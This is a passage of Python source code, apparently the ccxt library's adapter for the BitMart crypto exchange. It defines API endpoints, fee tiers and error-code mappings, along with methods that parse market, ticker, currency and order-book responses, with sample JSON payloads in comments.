'fetchTickers': True,\n 'fetchTime': True,\n 'fetchTrades': True,\n 'fetchWithdrawals': True,\n 'withdraw': True,\n },\n 'hostname': 'bitmart.com', # bitmart.info, bitmart.news for Hong Kong users\n 'urls': {\n 'logo': 'https://user-images.githubusercontent.com/1294454/129991357-8f47464b-d0f4-41d6-8a82-34122f0d1398.jpg',\n 'api': {\n 'rest': 'https://api-cloud.{hostname}', # bitmart.info for Hong Kong users\n },\n 'www': 'https://www.bitmart.com/',\n 'doc': 'https://developer-pro.bitmart.com/',\n 'referral': {\n 'url': 'http://www.bitmart.com/?r=rQCFLh',\n 'discount': 0.3,\n },\n 'fees': 'https://www.bitmart.com/fee/en',\n },\n 'requiredCredentials': {\n 'apiKey': True,\n 'secret': True,\n 'uid': True,\n },\n 'api': {\n 'public': {\n 'system': {\n 'get': {\n 'time': 5, # https://api-cloud.bitmart.com/system/time\n 'service': 5, # https://api-cloud.bitmart.com/system/service\n },\n },\n 'account': {\n 'get': {\n 'currencies': 10, # https://api-cloud.bitmart.com/account/v1/currencies\n },\n },\n 'spot': {\n 'get': {\n 'currencies': 1,\n 'symbols': 1,\n 'symbols/details': 1,\n 'ticker': 1, # ?symbol=BTC_USDT\n 'steps': 1, # ?symbol=BMX_ETH\n 'symbols/kline': 1, # ?symbol=BMX_ETH&step=15&from=1525760116&to=1525769116\n 'symbols/book': 1, # ?symbol=BMX_ETH&precision=6\n 'symbols/trades': 1, # ?symbol=BMX_ETH\n },\n },\n 'contract': {\n 'get': {\n 'tickers': 0.5,\n },\n },\n },\n 'private': {\n 'account': {\n 'get': {\n 'wallet': 0.5, # ?account_type=1\n 'deposit/address': 1, # ?currency=USDT-TRC20\n 'withdraw/charge': 1, # ?currency=BTC\n 'deposit-withdraw/history': 1, # ?limit=10&offset=1&operationType=withdraw\n 'deposit-withdraw/detail': 1, # ?id=1679952\n },\n 'post': {\n 'withdraw/apply': 1,\n },\n },\n 'spot': {\n 'get': {\n 'wallet': 0.5,\n 'order_detail': 0.1,\n 'orders': 0.5,\n 'trades': 0.5,\n },\n 'post': {\n 'submit_order': 0.1, # https://api-cloud.bitmart.com/spot/v1/submit_order\n 'cancel_order': 0.1, # https://api-cloud.bitmart.com/spot/v2/cancel_order\n 'cancel_orders': 0.1,\n },\n },\n },\n },\n 'timeframes': {\n '1m': 1,\n '3m': 3,\n '5m': 5,\n '15m': 15,\n '30m': 30,\n '45m': 45,\n '1h': 60,\n '2h': 120,\n '3h': 180,\n '4h': 240,\n '1d': 1440,\n '1w': 10080,\n '1M': 43200,\n },\n 'fees': {\n 'trading': {\n 'tierBased': True,\n 'percentage': True,\n 'taker': self.parse_number('0.0025'),\n 'maker': self.parse_number('0.0025'),\n 'tiers': {\n 'taker': [\n [self.parse_number('0'), 
self.parse_number('0.0020')],\n [self.parse_number('10'), self.parse_number('0.18')],\n [self.parse_number('50'), self.parse_number('0.0016')],\n [self.parse_number('250'), self.parse_number('0.0014')],\n [self.parse_number('1000'), self.parse_number('0.0012')],\n [self.parse_number('5000'), self.parse_number('0.0010')],\n [self.parse_number('25000'), self.parse_number('0.0008')],\n [self.parse_number('50000'), self.parse_number('0.0006')],\n ],\n 'maker': [\n [self.parse_number('0'), self.parse_number('0.001')],\n [self.parse_number('10'), self.parse_number('0.0009')],\n [self.parse_number('50'), self.parse_number('0.0008')],\n [self.parse_number('250'), self.parse_number('0.0007')],\n [self.parse_number('1000'), self.parse_number('0.0006')],\n [self.parse_number('5000'), self.parse_number('0.0005')],\n [self.parse_number('25000'), self.parse_number('0.0004')],\n [self.parse_number('50000'), self.parse_number('0.0003')],\n ],\n },\n },\n },\n 'precisionMode': TICK_SIZE,\n 'exceptions': {\n 'exact': {\n # general errors\n '30000': ExchangeError, # 404, Not found\n '30001': AuthenticationError, # 401, Header X-BM-KEY is empty\n '30002': AuthenticationError, # 401, Header X-BM-KEY not found\n '30003': AccountSuspended, # 401, Header X-BM-KEY has frozen\n '30004': AuthenticationError, # 401, Header X-BM-SIGN is empty\n '30005': AuthenticationError, # 401, Header X-BM-SIGN is wrong\n '30006': AuthenticationError, # 401, Header X-BM-TIMESTAMP is empty\n '30007': AuthenticationError, # 401, Header X-BM-TIMESTAMP range. Within a minute\n '30008': AuthenticationError, # 401, Header X-BM-TIMESTAMP invalid format\n '30010': PermissionDenied, # 403, IP is forbidden. We recommend enabling IP whitelist for API trading. After that reauth your account\n '30011': AuthenticationError, # 403, Header X-BM-KEY over expire time\n '30012': AuthenticationError, # 403, Header X-BM-KEY is forbidden to request it\n '30013': RateLimitExceeded, # 429, Request too many requests\n '30014': ExchangeNotAvailable, # 503, Service unavailable\n # funding account errors\n '60000': BadRequest, # 400, Invalid request(maybe the body is empty, or the int parameter passes string data)\n '60001': BadRequest, # 400, Asset account type does not exist\n '60002': BadRequest, # 400, currency does not exist\n '60003': ExchangeError, # 400, Currency has been closed recharge channel, if there is any problem, please consult customer service\n '60004': ExchangeError, # 400, Currency has been closed withdraw channel, if there is any problem, please consult customer service\n '60005': ExchangeError, # 400, Minimum amount is %s\n '60006': ExchangeError, # 400, Maximum withdraw precision is %d\n '60007': InvalidAddress, # 400, Only withdrawals from added addresses are allowed\n '60008': InsufficientFunds, # 400, Balance not enough\n '60009': ExchangeError, # 400, Beyond the limit\n '60010': ExchangeError, # 400, Withdraw id or deposit id not found\n '60011': InvalidAddress, # 400, Address is not valid\n '60012': ExchangeError, # 400, This action is not supported in self currency(If IOTA, HLX recharge and withdraw calls are prohibited)\n '60020': PermissionDenied, # 403, Your account is not allowed to recharge\n '60021': PermissionDenied, # 403, Your account is not allowed to withdraw\n '60022': PermissionDenied, # 403, No withdrawals for 24 hours\n '60030': BadRequest, # 405, Method Not Allowed\n '60031': BadRequest, # 415, Unsupported Media Type\n '60050': ExchangeError, # 500, User account not found\n '60051': ExchangeError, # 500, Internal 
Server Error\n # spot errors\n '50000': BadRequest, # 400, Bad Request\n '50001': BadSymbol, # 400, Symbol not found\n '50002': BadRequest, # 400, From Or To format error\n '50003': BadRequest, # 400, Step format error\n '50004': BadRequest, # 400, Kline size over 500\n '50005': OrderNotFound, # 400, Order Id not found\n '50006': InvalidOrder, # 400, Minimum size is %s\n '50007': InvalidOrder, # 400, Maximum size is %s\n '50008': InvalidOrder, # 400, Minimum price is %s\n '50009': InvalidOrder, # 400, Minimum count*price is %s\n '50010': InvalidOrder, # 400, RequestParam size is required\n '50011': InvalidOrder, # 400, RequestParam price is required\n '50012': InvalidOrder, # 400, RequestParam notional is required\n '50013': InvalidOrder, # 400, Maximum limit*offset is %d\n '50014': BadRequest, # 400, RequestParam limit is required\n '50015': BadRequest, # 400, Minimum limit is 1\n '50016': BadRequest, # 400, Maximum limit is %d\n '50017': BadRequest, # 400, RequestParam offset is required\n '50018': BadRequest, # 400, Minimum offset is 1\n '50019': BadRequest, # 400, Maximum price is %s\n # '50019': ExchangeError, # 400, Invalid status. validate status is [1=Failed, 2=Success, 3=Frozen Failed, 4=Frozen Success, 5=Partially Filled, 6=Fully Fulled, 7=Canceling, 8=Canceled\n '50020': InsufficientFunds, # 400, Balance not enough\n '50021': BadRequest, # 400, Invalid %s\n '50022': ExchangeNotAvailable, # 400, Service unavailable\n '50023': BadSymbol, # 400, This Symbol can't place order by api\n '50029': InvalidOrder, # {\"message\":\"param not match : size * price >=1000\",\"code\":50029,\"trace\":\"f931f030-b692-401b-a0c5-65edbeadc598\",\"data\":{}}\n '50030': InvalidOrder, # {\"message\":\"Order is already canceled\",\"code\":50030,\"trace\":\"8d6f64ee-ad26-45a4-9efd-1080f9fca1fa\",\"data\":{}}\n '53000': AccountSuspended, # 403, Your account is frozen due to security policies. Please contact customer service\n '53001': AccountSuspended, # {\"message\":\"Your kyc country is restricted. 
Please contact customer service.\",\"code\":53001,\"trace\":\"8b445940-c123-4de9-86d7-73c5be2e7a24\",\"data\":{}}\n '57001': BadRequest, # 405, Method Not Allowed\n '58001': BadRequest, # 415, Unsupported Media Type\n '59001': ExchangeError, # 500, User account not found\n '59002': ExchangeError, # 500, Internal Server Error\n # contract errors\n '40001': ExchangeError, # 400, Cloud account not found\n '40002': ExchangeError, # 400, out_trade_no not found\n '40003': ExchangeError, # 400, out_trade_no already existed\n '40004': ExchangeError, # 400, Cloud account count limit\n '40005': ExchangeError, # 400, Transfer vol precision error\n '40006': PermissionDenied, # 400, Invalid ip error\n '40007': BadRequest, # 400, Parse parameter error\n '40008': InvalidNonce, # 400, Check nonce error\n '40009': BadRequest, # 400, Check ver error\n '40010': BadRequest, # 400, Not found func error\n '40011': BadRequest, # 400, Invalid request\n '40012': ExchangeError, # 500, System error\n '40013': ExchangeError, # 400, Access too often\" CLIENT_TIME_INVALID, \"Please check your system time.\n '40014': BadSymbol, # 400, This contract is offline\n '40015': BadSymbol, # 400, This contract's exchange has been paused\n '40016': InvalidOrder, # 400, This order would trigger user position liquidate\n '40017': InvalidOrder, # 400, It is not possible to open and close simultaneously in the same position\n '40018': InvalidOrder, # 400, Your position is closed\n '40019': ExchangeError, # 400, Your position is in liquidation delegating\n '40020': InvalidOrder, # 400, Your position volume is not enough\n '40021': ExchangeError, # 400, The position is not exsit\n '40022': ExchangeError, # 400, The position is not isolated\n '40023': ExchangeError, # 400, The position would liquidate when sub margin\n '40024': ExchangeError, # 400, The position would be warnning of liquidation when sub margin\n '40025': ExchangeError, # 400, The position’s margin shouldn’t be lower than the base limit\n '40026': ExchangeError, # 400, You cross margin position is in liquidation delegating\n '40027': InsufficientFunds, # 400, You contract account available balance not enough\n '40028': PermissionDenied, # 400, Your plan order's count is more than system maximum limit.\n '40029': InvalidOrder, # 400, The order's leverage is too large.\n '40030': InvalidOrder, # 400, The order's leverage is too small.\n '40031': InvalidOrder, # 400, The deviation between current price and trigger price is too large.\n '40032': InvalidOrder, # 400, The plan order's life cycle is too long.\n '40033': InvalidOrder, # 400, The plan order's life cycle is too short.\n '40034': BadSymbol, # 400, This contract is not found\n },\n 'broad': {},\n },\n 'commonCurrencies': {\n 'COT': 'Community Coin',\n 'CPC': 'CPCoin',\n 'DMS': 'DimSum', # conflict with Dragon Mainland Shards\n 'FOX': 'Fox Finance',\n 'GDT': 'Gorilla Diamond',\n '$HERO': 'Step Hero',\n '$PAC': 'PAC',\n 'MIM': 'MIM Swarm',\n 'MVP': 'MVP Coin',\n 'ONE': 'Menlo One',\n 'PLA': 'Plair',\n 'TCT': 'TacoCat Token',\n 'TRU': 'Truebit', # conflict with TrueFi\n },\n 'options': {\n 'networks': {\n 'TRX': 'TRC20',\n 'ETH': 'ERC20',\n },\n 'defaultNetworks': {\n 'USDT': 'ERC20',\n },\n 'defaultType': 'spot', # 'spot', 'swap'\n 'fetchBalance': {\n 'type': 'spot', # 'spot', 'swap', 'contract', 'account'\n },\n 'createMarketBuyOrderRequiresPrice': True,\n },\n })\n\n def fetch_time(self, params={}):\n response = self.publicSystemGetTime(params)\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # 
\"trace\":\"c4e5e5b7-fe9f-4191-89f7-53f6c5bf9030\",\n # \"data\":{\n # \"server_time\":1599843709578\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n return self.safe_integer(data, 'server_time')\n\n def fetch_status(self, params={}):\n options = self.safe_value(self.options, 'fetchBalance', {})\n defaultType = self.safe_string(self.options, 'defaultType')\n type = self.safe_string(options, 'type', defaultType)\n type = self.safe_string(params, 'type', type)\n params = self.omit(params, 'type')\n response = self.publicSystemGetService(params)\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"serivce\":[\n # {\n # \"title\": \"Spot API Stop\",\n # \"service_type\": \"spot\",\n # \"status\": \"2\",\n # \"start_time\": 1527777538000,\n # \"end_time\": 1527777538000\n # },\n # {\n # \"title\": \"Contract API Stop\",\n # \"service_type\": \"contract\",\n # \"status\": \"2\",\n # \"start_time\": 1527777538000,\n # \"end_time\": 1527777538000\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n services = self.safe_value(data, 'service', [])\n servicesByType = self.index_by(services, 'service_type')\n if (type == 'swap') or (type == 'future'):\n type = 'contract'\n service = self.safe_value(servicesByType, type)\n status = None\n eta = None\n if service is not None:\n statusCode = self.safe_integer(service, 'status')\n if statusCode == 2:\n status = 'ok'\n else:\n status = 'maintenance'\n eta = self.safe_integer(service, 'end_time')\n self.status = self.extend(self.status, {\n 'status': status,\n 'updated': self.milliseconds(),\n 'eta': eta,\n })\n return self.status\n\n def fetch_spot_markets(self, params={}):\n response = self.publicSpotGetSymbolsDetails(params)\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a67c9146-086d-4d3f-9897-5636a9bb26e1\",\n # \"data\":{\n # \"symbols\":[\n # {\n # \"symbol\":\"PRQ_BTC\",\n # \"symbol_id\":1232,\n # \"base_currency\":\"PRQ\",\n # \"quote_currency\":\"BTC\",\n # \"quote_increment\":\"1.0000000000\",\n # \"base_min_size\":\"1.0000000000\",\n # \"base_max_size\":\"10000000.0000000000\",\n # \"price_min_precision\":8,\n # \"price_max_precision\":10,\n # \"expiration\":\"NA\",\n # \"min_buy_amount\":\"0.0001000000\",\n # \"min_sell_amount\":\"0.0001000000\"\n # },\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n symbols = self.safe_value(data, 'symbols', [])\n result = []\n for i in range(0, len(symbols)):\n market = symbols[i]\n id = self.safe_string(market, 'symbol')\n numericId = self.safe_integer(market, 'symbol_id')\n baseId = self.safe_string(market, 'base_currency')\n quoteId = self.safe_string(market, 'quote_currency')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = base + '/' + quote\n #\n # https://github.com/bitmartexchange/bitmart-official-api-docs/blob/master/rest/public/symbols_details.md#response-details\n # from the above API doc:\n # quote_increment Minimum order price as well as the price increment\n # price_min_precision Minimum price precision(digit) used to query price and kline\n # price_max_precision Maximum price precision(digit) used to query price and kline\n #\n # the docs are wrong: https://github.com/ccxt/ccxt/issues/5612\n #\n pricePrecision = self.safe_integer(market, 'price_max_precision')\n precision = {\n 'amount': self.safe_number(market, 'base_min_size'),\n 'price': 
self.parse_number(self.decimal_to_precision(math.pow(10, -pricePrecision), ROUND, 14)),\n }\n minBuyCost = self.safe_number(market, 'min_buy_amount')\n minSellCost = self.safe_number(market, 'min_sell_amount')\n minCost = max(minBuyCost, minSellCost)\n limits = {\n 'amount': {\n 'min': self.safe_number(market, 'base_min_size'),\n 'max': self.safe_number(market, 'base_max_size'),\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': minCost,\n 'max': None,\n },\n }\n result.append({\n 'id': id,\n 'numericId': numericId,\n 'symbol': symbol,\n 'base': base,\n 'quote': quote,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'type': 'spot',\n 'spot': True,\n 'future': False,\n 'swap': False,\n 'precision': precision,\n 'limits': limits,\n 'info': market,\n 'active': True,\n })\n return result\n\n def fetch_contract_markets(self, params={}):\n response = self.publicContractGetContracts(params)\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"7fcedfb5-a660-4780-8a7a-b36a9e2159f7\",\n # \"data\":{\n # \"contracts\":[\n # {\n # \"contract\":{\n # \"contract_id\":1,\n # \"index_id\":1,\n # \"name\":\"BTCUSDT\",\n # \"display_name\":\"BTCUSDT永续合约\",\n # \"display_name_en\":\"BTCUSDT_SWAP\",\n # \"contract_type\":1,\n # \"base_coin\":\"BTC\",\n # \"quote_coin\":\"USDT\",\n # \"price_coin\":\"BTC\",\n # \"exchange\":\"*\",\n # \"contract_size\":\"0.0001\",\n # \"begin_at\":\"2018-08-17T04:00:00Z\",\n # \"delive_at\":\"2020-08-15T12:00:00Z\",\n # \"delivery_cycle\":28800,\n # \"min_leverage\":\"1\",\n # \"max_leverage\":\"100\",\n # \"price_unit\":\"0.1\",\n # \"vol_unit\":\"1\",\n # \"value_unit\":\"0.0001\",\n # \"min_vol\":\"1\",\n # \"max_vol\":\"300000\",\n # \"liquidation_warn_ratio\":\"0.85\",\n # \"fast_liquidation_ratio\":\"0.8\",\n # \"settgle_type\":1,\n # \"open_type\":3,\n # \"compensate_type\":1,\n # \"status\":3,\n # \"block\":1,\n # \"rank\":1,\n # \"created_at\":\"2018-07-12T19:16:57Z\",\n # \"depth_bord\":\"1.001\",\n # \"base_coin_zh\":\"比特币\",\n # \"base_coin_en\":\"Bitcoin\",\n # \"max_rate\":\"0.00375\",\n # \"min_rate\":\"-0.00375\"\n # },\n # \"risk_limit\":{\"contract_id\":1,\"base_limit\":\"1000000\",\"step\":\"500000\",\"maintenance_margin\":\"0.005\",\"initial_margin\":\"0.01\"},\n # \"fee_config\":{\"contract_id\":1,\"maker_fee\":\"-0.0003\",\"taker_fee\":\"0.001\",\"settlement_fee\":\"0\",\"created_at\":\"2018-07-12T20:47:22Z\"},\n # \"plan_order_config\":{\"contract_id\":0,\"min_scope\":\"0.001\",\"max_scope\":\"2\",\"max_count\":10,\"min_life_cycle\":24,\"max_life_cycle\":168}\n # },\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n contracts = self.safe_value(data, 'contracts', [])\n result = []\n for i in range(0, len(contracts)):\n market = contracts[i]\n contract = self.safe_value(market, 'contract', {})\n id = self.safe_string(contract, 'contract_id')\n numericId = self.safe_integer(contract, 'contract_id')\n baseId = self.safe_string(contract, 'base_coin')\n quoteId = self.safe_string(contract, 'quote_coin')\n base = self.safe_currency_code(baseId)\n quote = self.safe_currency_code(quoteId)\n symbol = self.safe_string(contract, 'name')\n #\n # https://github.com/bitmartexchange/bitmart-official-api-docs/blob/master/rest/public/symbols_details.md#response-details\n # from the above API doc:\n # quote_increment Minimum order price as well as the price increment\n # price_min_precision Minimum price precision(digit) used to query price and kline\n # price_max_precision Maximum price 
precision(digit) used to query price and kline\n #\n # the docs are wrong: https://github.com/ccxt/ccxt/issues/5612\n #\n amountPrecision = self.safe_number(contract, 'vol_unit')\n pricePrecision = self.safe_number(contract, 'price_unit')\n precision = {\n 'amount': amountPrecision,\n 'price': pricePrecision,\n }\n limits = {\n 'amount': {\n 'min': self.safe_number(contract, 'min_vol'),\n 'max': self.safe_number(contract, 'max_vol'),\n },\n 'price': {\n 'min': None,\n 'max': None,\n },\n 'cost': {\n 'min': None,\n 'max': None,\n },\n }\n contractType = self.safe_value(contract, 'contract_type')\n future = False\n swap = False\n type = 'contract'\n if contractType == 1:\n type = 'swap'\n swap = True\n elif contractType == 2:\n type = 'future'\n future = True\n feeConfig = self.safe_value(market, 'fee_config', {})\n maker = self.safe_number(feeConfig, 'maker_fee')\n taker = self.safe_number(feeConfig, 'taker_fee')\n result.append({\n 'id': id,\n 'numericId': numericId,\n 'symbol': symbol,\n 'base': base,\n 'quote': quote,\n 'baseId': baseId,\n 'quoteId': quoteId,\n 'maker': maker,\n 'taker': taker,\n 'type': type,\n 'spot': False,\n 'future': future,\n 'swap': swap,\n 'precision': precision,\n 'limits': limits,\n 'info': market,\n 'active': None,\n })\n return result\n\n def fetch_markets(self, params={}):\n return self.fetch_spot_markets()\n\n def fetch_funding_fee(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privateAccountGetWithdrawCharge(self.extend(request, params))\n #\n # {\n # message: 'OK',\n # code: '1000',\n # trace: '3ecc0adf-91bd-4de7-aca1-886c1122f54f',\n # data: {\n # today_available_withdraw_BTC: '100.0000',\n # min_withdraw: '0.005',\n # withdraw_precision: '8',\n # withdraw_fee: '0.000500000000000000000000000000'\n # }\n # }\n #\n data = response['data']\n withdrawFees = {}\n withdrawFees[code] = self.safe_number(data, 'withdraw_fee')\n return {\n 'info': response,\n 'withdraw': withdrawFees,\n 'deposit': {},\n }\n\n def parse_ticker(self, ticker, market=None):\n #\n # spot\n #\n # {\n # \"symbol\":\"ETH_BTC\",\n # \"last_price\":\"0.036037\",\n # \"quote_volume_24h\":\"4380.6660000000\",\n # \"base_volume_24h\":\"159.3582006712\",\n # \"high_24h\":\"0.036972\",\n # \"low_24h\":\"0.035524\",\n # \"open_24h\":\"0.036561\",\n # \"close_24h\":\"0.036037\",\n # \"best_ask\":\"0.036077\",\n # \"best_ask_size\":\"9.9500\",\n # \"best_bid\":\"0.035983\",\n # \"best_bid_size\":\"4.2792\",\n # \"fluctuation\":\"-0.0143\",\n # \"s_t\": \"1630981727\", # ws only\n # \"url\":\"https://www.bitmart.com/trade?symbol=ETH_BTC\"\n # }\n #\n # contract\n #\n # {\n # contract_symbol: \"DGBUSDT\",\n # last_price: \"0.05759\",\n # index_price: \"0.05757755\",\n # last_funding_rate: \"0.00010000\",\n # price_change_percent_24h: \"0.244\",\n # volume_24h: \"64303817.028126\",\n # url: \"https://futures.bitmart.com/en?symbol=DGBUSDT\"\n # }\n #\n timestamp = self.safe_timestamp_2(ticker, 'timestamp', 's_t', self.milliseconds())\n marketId = self.safe_string_2(ticker, 'symbol', 'contract_id')\n marketId = self.safe_string(ticker, 'contract_symbol', marketId)\n symbol = self.safe_symbol(marketId, market)\n last = self.safe_number_2(ticker, 'close_24h', 'last_price')\n percentage = self.safe_number_2(ticker, 'fluctuation', 'rise_fall_rate')\n if percentage is not None:\n percentage *= 100\n if percentage is None:\n percentage = self.safe_number(ticker, 'price_change_percent_24h')\n baseVolume = 
self.safe_number_2(ticker, 'base_coin_volume', 'base_volume_24h')\n quoteVolume = self.safe_number_2(ticker, 'quote_coin_volume', 'quote_volume_24h')\n quoteVolume = self.safe_number(ticker, 'volume_24h', quoteVolume)\n open = self.safe_number_2(ticker, 'open_24h', 'open')\n average = None\n if (last is not None) and (open is not None):\n average = self.sum(last, open) / 2\n average = self.safe_number(ticker, 'avg_price', average)\n price = self.safe_value(ticker, 'depth_price', ticker)\n return {\n 'symbol': symbol,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'high': self.safe_number_2(ticker, 'high', 'high_24h'),\n 'low': self.safe_number_2(ticker, 'low', 'low_24h'),\n 'bid': self.safe_number_2(price, 'best_bid', 'bid_price'),\n 'bidVolume': self.safe_number(ticker, 'best_bid_size'),\n 'ask': self.safe_number_2(price, 'best_ask', 'ask_price'),\n 'askVolume': self.safe_number(ticker, 'best_ask_size'),\n 'vwap': None,\n 'open': self.safe_number(ticker, 'open_24h'),\n 'close': last,\n 'last': last,\n 'previousClose': None,\n 'change': None,\n 'percentage': percentage,\n 'average': average,\n 'baseVolume': baseVolume,\n 'quoteVolume': quoteVolume,\n 'info': ticker,\n }\n\n def fetch_ticker(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['swap'] or market['future']:\n method = 'publicContractGetTickers'\n request['contractID'] = market['id']\n elif market['spot']:\n method = 'publicSpotGetTicker'\n request['symbol'] = market['id']\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"6aa5b923-2f57-46e3-876d-feca190e0b82\",\n # \"data\":{\n # \"tickers\":[\n # {\n # \"symbol\":\"ETH_BTC\",\n # \"last_price\":\"0.036037\",\n # \"quote_volume_24h\":\"4380.6660000000\",\n # \"base_volume_24h\":\"159.3582006712\",\n # \"high_24h\":\"0.036972\",\n # \"low_24h\":\"0.035524\",\n # \"open_24h\":\"0.036561\",\n # \"close_24h\":\"0.036037\",\n # \"best_ask\":\"0.036077\",\n # \"best_ask_size\":\"9.9500\",\n # \"best_bid\":\"0.035983\",\n # \"best_bid_size\":\"4.2792\",\n # \"fluctuation\":\"-0.0143\",\n # \"url\":\"https://www.bitmart.com/trade?symbol=ETH_BTC\"\n # }\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # message: \"OK\",\n # code: \"1000\",\n # trace: \"84a0dc44-b395-4bae-a1b7-fe1201defd51\",\n # data: {\n # tickers: [\n # {\n # contract_symbol: \"DGBUSDT\",\n # last_price: \"0.05759\",\n # index_price: \"0.05757755\",\n # last_funding_rate: \"0.00010000\",\n # price_change_percent_24h: \"0.244\",\n # volume_24h: \"64303817.028126\",\n # url: \"https://futures.bitmart.com/en?symbol=DGBUSDT\"\n # },\n # ],\n # },\n # }\n #\n data = self.safe_value(response, 'data', {})\n tickers = self.safe_value(data, 'tickers', [])\n tickersById = self.index_by(tickers, 'symbol')\n ticker = self.safe_value(tickersById, market['id'])\n return self.parse_ticker(ticker, market)\n\n def fetch_tickers(self, symbols=None, params={}):\n self.load_markets()\n defaultType = self.safe_string(self.options, 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n params = self.omit(params, 'type')\n method = None\n if (type == 'swap') or (type == 'future'):\n method = 'publicContractGetTickers'\n elif type == 'spot':\n method = 'publicSpotGetTicker'\n response = getattr(self, method)(params)\n data = self.safe_value(response, 'data', {})\n tickers = self.safe_value(data, 'tickers', [])\n result = {}\n for i in 
range(0, len(tickers)):\n ticker = self.parse_ticker(tickers[i])\n symbol = ticker['symbol']\n result[symbol] = ticker\n return self.filter_by_array(result, 'symbol', symbols)\n\n def fetch_currencies(self, params={}):\n response = self.publicAccountGetCurrencies(params)\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"8c768b3c-025f-413f-bec5-6d6411d46883\",\n # \"data\":{\n # \"currencies\":[\n # {\"currency\":\"MATIC\",\"name\":\"Matic Network\",\"withdraw_enabled\":true,\"deposit_enabled\":true},\n # {\"currency\":\"KTN\",\"name\":\"Kasoutuuka News\",\"withdraw_enabled\":true,\"deposit_enabled\":false},\n # {\"currency\":\"BRT\",\"name\":\"Berith\",\"withdraw_enabled\":true,\"deposit_enabled\":true},\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n currencies = self.safe_value(data, 'currencies', [])\n result = {}\n for i in range(0, len(currencies)):\n currency = currencies[i]\n id = self.safe_string(currency, 'currency')\n code = self.safe_currency_code(id)\n name = self.safe_string(currency, 'name')\n withdrawEnabled = self.safe_value(currency, 'withdraw_enabled')\n depositEnabled = self.safe_value(currency, 'deposit_enabled')\n active = withdrawEnabled and depositEnabled\n result[code] = {\n 'id': id,\n 'code': code,\n 'name': name,\n 'info': currency, # the original payload\n 'active': active,\n 'fee': None,\n 'precision': None,\n 'limits': {\n 'amount': {'min': None, 'max': None},\n 'withdraw': {'min': None, 'max': None},\n },\n }\n return result\n\n def fetch_order_book(self, symbol, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n method = 'publicSpotGetSymbolsBook'\n request['symbol'] = market['id']\n if limit is not None:\n request['size'] = limit # default 50, max 200\n # request['precision'] = 4 # optional price precision / depth level whose range is defined in symbol details\n elif market['swap'] or market['future']:\n method = 'publicContractGetDepth'\n request['contractID'] = market['id']\n if limit is not None:\n request['count'] = limit # returns all records if size is omitted\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"8254f8fc-431d-404f-ad9a-e716339f66c7\",\n # \"data\":{\n # \"buys\":[\n # {\"amount\":\"4.7091\",\"total\":\"4.71\",\"price\":\"0.034047\",\"count\":\"1\"},\n # {\"amount\":\"5.7439\",\"total\":\"10.45\",\"price\":\"0.034039\",\"count\":\"1\"},\n # {\"amount\":\"2.5249\",\"total\":\"12.98\",\"price\":\"0.032937\",\"count\":\"1\"},\n # ],\n # \"sells\":[\n # {\"amount\":\"41.4365\",\"total\":\"41.44\",\"price\":\"0.034174\",\"count\":\"1\"},\n # {\"amount\":\"4.2317\",\"total\":\"45.67\",\"price\":\"0.034183\",\"count\":\"1\"},\n # {\"amount\":\"0.3000\",\"total\":\"45.97\",\"price\":\"0.034240\",\"count\":\"1\"},\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"c330dfca-ca5b-4f15-b350-9fef3f049b4f\",\n # \"data\":{\n # \"sells\":[\n # {\"price\":\"347.6\",\"vol\":\"6678\"},\n # {\"price\":\"347.7\",\"vol\":\"3452\"},\n # {\"price\":\"347.8\",\"vol\":\"6331\"},\n # ],\n # \"buys\":[\n # {\"price\":\"347.5\",\"vol\":\"6222\"},\n # {\"price\":\"347.4\",\"vol\":\"20979\"},\n # {\"price\":\"347.3\",\"vol\":\"15179\"},\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n if market['spot']:\n return self.parse_order_book(data, symbol, None, 
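\n                # field mapping for the raw spot payload: bids list key, asks list key, price key, amount key\n                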
